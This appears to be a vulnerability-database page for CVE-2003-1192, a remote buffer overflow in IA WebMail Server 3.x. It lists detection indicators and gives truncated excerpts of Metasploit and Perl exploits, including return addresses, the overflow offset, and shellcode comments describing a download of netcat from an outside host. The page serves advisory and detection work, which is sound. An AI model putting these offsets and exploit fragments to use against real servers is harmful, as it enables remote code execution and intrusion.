CVE-2003-1192
published 2003-11-03CVE-2003-1192: Stack-based buffer overflow in IA WebMail Server 3.1.0 allows remote attackers to execute arbitrary code via a long GET request.
PriorityP260critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
69.17%
99.3th percentile
Stack-based buffer overflow in IA WebMail Server 3.1.0 allows remote attackers to execute arbitrary code via a long GET request.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| truenorth_software | ia_webmail_server | — | — |
| truenorth_software | ia_webmail_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x4c\xf8\x12 (EIP overwrite return address, offset 1040)
bytes↗
\x33\xBD\x02\x10 (JMP ESP in iaregdll.dll, EIP overwrite at offset 1036+4)
bytes↗
0x1002bd33 (Metasploit Ret address for IA WebMail 3.x)
- →Flag HTTP GET requests to port 8180 where the URI length exceeds 1036 bytes, consistent with all known exploit variants ↗
- →Presence of the literal string 'META' at offset 1036 in the GET URI is a Metasploit-specific exploit marker ↗
- →Bad characters for payload encoding include null bytes and common HTTP special characters; presence of raw binary in GET URI path is anomalous ↗
- →Shellcode in exploit variant (exploit-db 124) downloads a file from elitehaven.net; monitor for outbound connections to that domain or creation of c:\nc.exe ↗
- →The exploit targets iaregdll.dll version 1.0.0.5 using a static JMP ESP gadget; presence of this DLL version on a web server is an indicator of a vulnerable target ↗
- ·The Metasploit module explicitly states it has not been tested against a live system; the return address (0x1002bd33) and buffer length (1036) may not be reliable across all patch levels ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
IA WebMail Server 3.x - Remote Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2003-1192 IA WebMail Server 3.x - Remote Buffer Overflow (Metasploit)
IA WebMail Server 3.x - Remote Buffer Overflow (Metasploit)
---
##
# $Id: ia_webmail.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'IA WebMail 3.x Buffer Overflow',
'Description' => %q{
This exploits a stack buffer overflow in the IA WebMail server.
This exploit has not been tested against a live system at
this time.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2003-1192'],
[ 'OSVDB', '2757'],
[ 'BID', '8965'],
[ 'URL', 'http://www.k-otik.net/exploits/11.19.iaw
Exploit-DB
IA WebMail Server 3.x - 'iaregdll.dll 1.0.0.5' Remote Overflow
exploitdb·2003-11-19
CVE-2003-1192 IA WebMail Server 3.x - 'iaregdll.dll 1.0.0.5' Remote Overflow
IA WebMail Server 3.x - 'iaregdll.dll 1.0.0.5' Remote Overflow
---
#!/usr/bin/perl -w
#
# IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit
# Application Specific Shellcode: URL Downloader
# - www elitehaven net/ncat.exe (downloaded)
# - c:\nc.exe (created)
#
# By Peter Winter-Smith peter4020 hotmail com
# Shellcode included - will need reassembling to use different
# urls and files etc.
#
# Tested against:
# - Windows XP Home SP1
# - Windows 2000 Pro SP4
#
# Shellcode should work each time, since it steals it's addresses
# from the iaregdll.dll module import tables.
# Uses a very static jmp esp in iaregdll.dll - Should work on all
# servers without alteration!
#
# If the remote server is running a firewall, the urldownloader
# will be unable to spawn a shell, so for testing I
Exploit-DB
IA WebMail Server 3.0/3.1 - GET Buffer Overrun
exploitdb·2003-11-03
CVE-2003-1192 IA WebMail Server 3.0/3.1 - GET Buffer Overrun
IA WebMail Server 3.0/3.1 - GET Buffer Overrun
---
source: https://www.securityfocus.com/bid/8965/info
IA WebMail Server is said to be prone to a remote buffer overrun that could allow an attacker to execute arbitrary code. The problem occurs due to insufficient bounds checking when handling GET requests. As a result, an attacker may be capable of overrunning the bounds of an internal memory buffer and effectively control the flow of execution.
#!/usr/bin/perl
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => "8180",
);
unless ($remote) { die "cannot connect to http daemon on $host" }
$remote->autoflush(1);
$shellcode = join ("",
"\x90", # - NOP
"\xCC", # - INT3
"\x90"
Metasploit
IA WebMail 3.x Buffer Overflow
metasploit
IA WebMail 3.x Buffer Overflow
IA WebMail 3.x Buffer Overflow
This exploits a stack buffer overflow in the IA WebMail server. This exploit has not been tested against a live system at this time.
No writeups or analysis indexed.
http://secunia.com/advisories/10107http://securitytracker.com/id?1008075http://www.derkeiler.com/Mailing-Lists/VulnWatch/2003-11/0001.htmlhttp://www.elitehaven.net/iawebmail.txthttp://www.osvdb.org/2757http://www.securiteam.com/windowsntfocus/6B002158UQ.htmlhttp://www.securityfocus.com/bid/8965https://exchange.xforce.ibmcloud.com/vulnerabilities/13580http://secunia.com/advisories/10107http://securitytracker.com/id?1008075http://www.derkeiler.com/Mailing-Lists/VulnWatch/2003-11/0001.htmlhttp://www.elitehaven.net/iawebmail.txthttp://www.osvdb.org/2757http://www.securiteam.com/windowsntfocus/6B002158UQ.htmlhttp://www.securityfocus.com/bid/8965https://exchange.xforce.ibmcloud.com/vulnerabilities/13580
2003-11-03
Published